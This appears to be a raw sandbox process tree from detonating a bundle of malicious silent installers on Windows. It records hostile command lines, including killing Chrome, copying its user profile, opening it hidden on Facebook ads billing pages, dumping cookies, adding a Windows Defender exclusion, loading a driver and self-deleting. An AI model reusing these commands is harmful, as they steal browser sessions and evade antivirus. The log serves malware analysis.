C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1640 /prefetch:815⤵PID:5808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1556 /prefetch:215⤵PID:9020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:115⤵PID:8992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:115⤵PID:8980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:115⤵PID:3608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:115⤵PID:9224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4500 /prefetch:815⤵PID:6964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:815⤵PID:6904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1456,14170591129426674581,16476960791733646681,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:815⤵PID:13452
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe12⤵PID:6500
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe12⤵PID:1852
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe12⤵PID:6624
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe" /Verysilent /subid=5778⤵PID:15076
-
C:\Users\Admin\AppData\Local\Temp\is-772N7.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-772N7.tmp\Setup3310.tmp" /SL5="$C0562,802346,56832,C:\Users\Admin\AppData\Local\Temp\flzhmouczqi\Setup3310.exe" /Verysilent /subid=5779⤵PID:10816
-
C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe" /Verysilent10⤵PID:8216
-
C:\Users\Admin\AppData\Local\Temp\is-IO8BB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IO8BB.tmp\Setup.tmp" /SL5="$2075C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-Q30S0.tmp\Setup.exe" /Verysilent11⤵PID:11112
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe" /Verysilent12⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\is-0S9B2.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-0S9B2.tmp\Messure.tmp" /SL5="$90538,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Messure.exe" /Verysilent13⤵PID:11440
-
C:\Users\Admin\AppData\Local\Temp\is-AN15I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AN15I.tmp\Setup.exe" /VERYSILENT14⤵PID:4864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe" /Verysilent12⤵PID:12460
-
C:\Users\Admin\AppData\Local\Temp\is-JVMI0.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-JVMI0.tmp\PictureLAb.tmp" /SL5="$50676,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\PictureLAb.exe" /Verysilent13⤵PID:12980
-
C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe" /VERYSILENT14⤵PID:14348
-
C:\Users\Admin\AppData\Local\Temp\is-K49IE.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-K49IE.tmp\Setup.tmp" /SL5="$20810,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-PPTBG.tmp\Setup.exe" /VERYSILENT15⤵PID:14360
-
C:\Users\Admin\AppData\Local\Temp\is-3CFEA.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-3CFEA.tmp\def.exe" /S /UID=lab21416⤵PID:4200
-
C:\Users\Admin\AppData\Local\Temp\63-c321b-ba2-0cea8-c9a095b0edd2d\Waejaewaxelo.exe"C:\Users\Admin\AppData\Local\Temp\63-c321b-ba2-0cea8-c9a095b0edd2d\Waejaewaxelo.exe"17⤵PID:6564
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exe & exit18⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\04rventp.gyy\md7_7dfj.exe19⤵PID:12268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exe & exit18⤵PID:10684
-
C:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\a4clejwb.s2p\askinstall18.exe19⤵PID:8808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵PID:7580
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
PID:14632
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y20⤵PID:12432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/20⤵PID:13348
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\mfhsghshee99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2021⤵PID:9056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,13783270682761060530,88082000358438362,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1648 /prefetch:821⤵PID:14256
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exe & exit18⤵PID:13108
-
C:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exeC:\Users\Admin\AppData\Local\Temp\5kuhogcj.hck\customer4.exe19⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"20⤵PID:14784
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w110ctw4.q4x\GcleanerWW.exe /mixone & exit18⤵PID:12036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe & exit18⤵PID:9388
-
C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe19⤵PID:10648
-
C:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2pndjj4d.yf1\privacytools5.exe20⤵PID:4436
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exe /8-2222 & exit18⤵PID:9032
-
C:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exeC:\Users\Admin\AppData\Local\Temp\5ghku2kw.vg3\setup.exe /8-222219⤵PID:5332
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Old-Sound"20⤵PID:14584
-
-
C:\Program Files (x86)\Old-Sound\7za.exe"C:\Program Files (x86)\Old-Sound\7za.exe" e -p154.61.71.51 winamp-plugins.7z20⤵PID:14880
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Old-Sound\setup.exe" -map "C:\Program Files (x86)\Old-Sound\WinmonProcessMonitor.sys""20⤵PID:13236
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" -map "C:\Program Files (x86)\Old-Sound\WinmonProcessMonitor.sys"21⤵PID:7900
-
-
-
C:\Program Files (x86)\Old-Sound\7za.exe"C:\Program Files (x86)\Old-Sound\7za.exe" e -p154.61.71.51 winamp.7z20⤵PID:4440
-
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" /8-222220⤵PID:12596
-
C:\Program Files (x86)\Old-Sound\setup.exe"C:\Program Files (x86)\Old-Sound\setup.exe" /8-222221⤵PID:11452
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exe & exit18⤵PID:10704
-
C:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\whjvidn4.zqs\MultitimerFour.exe19⤵PID:6172
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵PID:12684
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 1 3.1615354240.60485980501cc 10421⤵PID:14312
-
C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\V27JNP3B6Z\multitimer.exe" 2 3.1615354240.60485980501cc22⤵PID:10964
-
C:\Users\Admin\AppData\Local\Temp\tlyqtmbx5hk\hlghtc01dbq.exe"C:\Users\Admin\AppData\Local\Temp\tlyqtmbx5hk\hlghtc01dbq.exe" /ustwo INSTALL23⤵PID:14568
-
-
C:\Users\Admin\AppData\Local\Temp\rnejsvukehq\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\rnejsvukehq\askinstall24.exe"23⤵PID:14964
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵PID:11968
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
PID:14580
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵PID:11028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵PID:11848
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵PID:7680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,12140673914739305102,330341830004578802,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1644 /prefetch:825⤵PID:12336
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe" /Verysilent /subid=57723⤵PID:12852
-
C:\Users\Admin\AppData\Local\Temp\is-SDQBT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-SDQBT.tmp\Setup3310.tmp" /SL5="$6097C,802346,56832,C:\Users\Admin\AppData\Local\Temp\y2bipyttlx0\Setup3310.exe" /Verysilent /subid=57724⤵PID:9236
-
C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe" /Verysilent25⤵PID:13688
-
C:\Users\Admin\AppData\Local\Temp\is-SN95L.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SN95L.tmp\Setup.tmp" /SL5="$20A20,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IC31F.tmp\Setup.exe" /Verysilent26⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe" /Verysilent27⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\is-8L97F.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-8L97F.tmp\Messure.tmp" /SL5="$10AB6,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Messure.exe" /Verysilent28⤵PID:12952
-
C:\Users\Admin\AppData\Local\Temp\is-0ULDJ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0ULDJ.tmp\Setup.exe" /VERYSILENT29⤵PID:13640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe" /Verysilent27⤵PID:8196
-
C:\Users\Admin\AppData\Local\Temp\is-B98R9.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-B98R9.tmp\PictureLAb.tmp" /SL5="$60834,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\PictureLAb.exe" /Verysilent28⤵PID:14192
-
C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe" /VERYSILENT29⤵PID:14596
-
C:\Users\Admin\AppData\Local\Temp\is-3ITQ9.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3ITQ9.tmp\Setup.tmp" /SL5="$30AEC,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-TPV82.tmp\Setup.exe" /VERYSILENT30⤵PID:11744
-
C:\Users\Admin\AppData\Local\Temp\is-H59DP.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-H59DP.tmp\def.exe" /S /UID=lab21431⤵PID:10344
-
C:\Users\Admin\AppData\Local\Temp\bd-12e9e-594-9e4ac-b5f747c31fa8c\Larecodeme.exe"C:\Users\Admin\AppData\Local\Temp\bd-12e9e-594-9e4ac-b5f747c31fa8c\Larecodeme.exe"32⤵PID:6712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exe & exit33⤵PID:15252
-
C:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\uxaiim15.5zl\md7_7dfj.exe34⤵PID:12400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exe & exit33⤵PID:11556
-
C:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\b5n2xlxz.ntn\askinstall18.exe34⤵PID:5784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵PID:6024
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
PID:12580
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵PID:15096
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exe & exit33⤵PID:14304
-
C:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exeC:\Users\Admin\AppData\Local\Temp\5laxtx1p.knr\customer4.exe34⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"35⤵PID:15184
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rw0rstkx.g5d\GcleanerWW.exe /mixone & exit33⤵PID:4788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe & exit33⤵PID:6644
-
C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe34⤵PID:9784
-
C:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\0ulmpzk5.s2o\privacytools5.exe35⤵PID:11572
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe" /Verysilent27⤵PID:14292
-
C:\Users\Admin\AppData\Local\Temp\is-43A4E.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-43A4E.tmp\Delta.tmp" /SL5="$40ADA,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\Delta.exe" /Verysilent28⤵PID:4252
-
C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe" /VERYSILENT29⤵PID:15072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-1TJ45.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit30⤵PID:13736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f31⤵
- Kills process with taskkill
PID:13652
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe" /Verysilent27⤵PID:10776
-
C:\Users\Admin\AppData\Local\Temp\is-L1D30.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-L1D30.tmp\zznote.tmp" /SL5="$60B94,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\zznote.exe" /Verysilent28⤵PID:10388
-
C:\Users\Admin\AppData\Local\Temp\is-SCCCV.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-SCCCV.tmp\jg4_4jaa.exe" /silent29⤵PID:15176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-87EGJ.tmp\hjjgaa.exe" /Verysilent27⤵PID:11080
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:15288
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵PID:11892
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe" /VERYSILENT23⤵PID:13216
-
C:\Users\Admin\AppData\Local\Temp\is-Q1GJJ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q1GJJ.tmp\chashepro3.tmp" /SL5="$209D0,1478410,58368,C:\Users\Admin\AppData\Local\Temp\2zas3fueio2\chashepro3.exe" /VERYSILENT24⤵PID:13628
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe" /Verysilent12⤵PID:11372
-
C:\Users\Admin\AppData\Local\Temp\is-ICOBB.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ICOBB.tmp\Delta.tmp" /SL5="$60676,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\Delta.exe" /Verysilent13⤵PID:11760
-
C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe" /VERYSILENT14⤵PID:9208
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-RUITR.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵PID:13156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:6740
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
PID:11460
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe" /Verysilent12⤵PID:12416
-
C:\Users\Admin\AppData\Local\Temp\is-KG0SK.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-KG0SK.tmp\zznote.tmp" /SL5="$607C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\zznote.exe" /Verysilent13⤵PID:10848
-
C:\Users\Admin\AppData\Local\Temp\is-CP0AR.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-CP0AR.tmp\jg4_4jaa.exe" /silent14⤵PID:1872
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-RRCDM.tmp\hjjgaa.exe" /Verysilent12⤵PID:12296
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:2964
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:8060
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\j4xbcg2nsqr\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\j4xbcg2nsqr\askinstall24.exe"8⤵PID:6364
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:12092
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:8352
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵PID:9992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/9⤵PID:6764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,6138945573974933891,118601829407231764,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1744 /prefetch:810⤵PID:12732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1484,6138945573974933891,118601829407231764,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1552 /prefetch:210⤵PID:12668
-
-
-
-
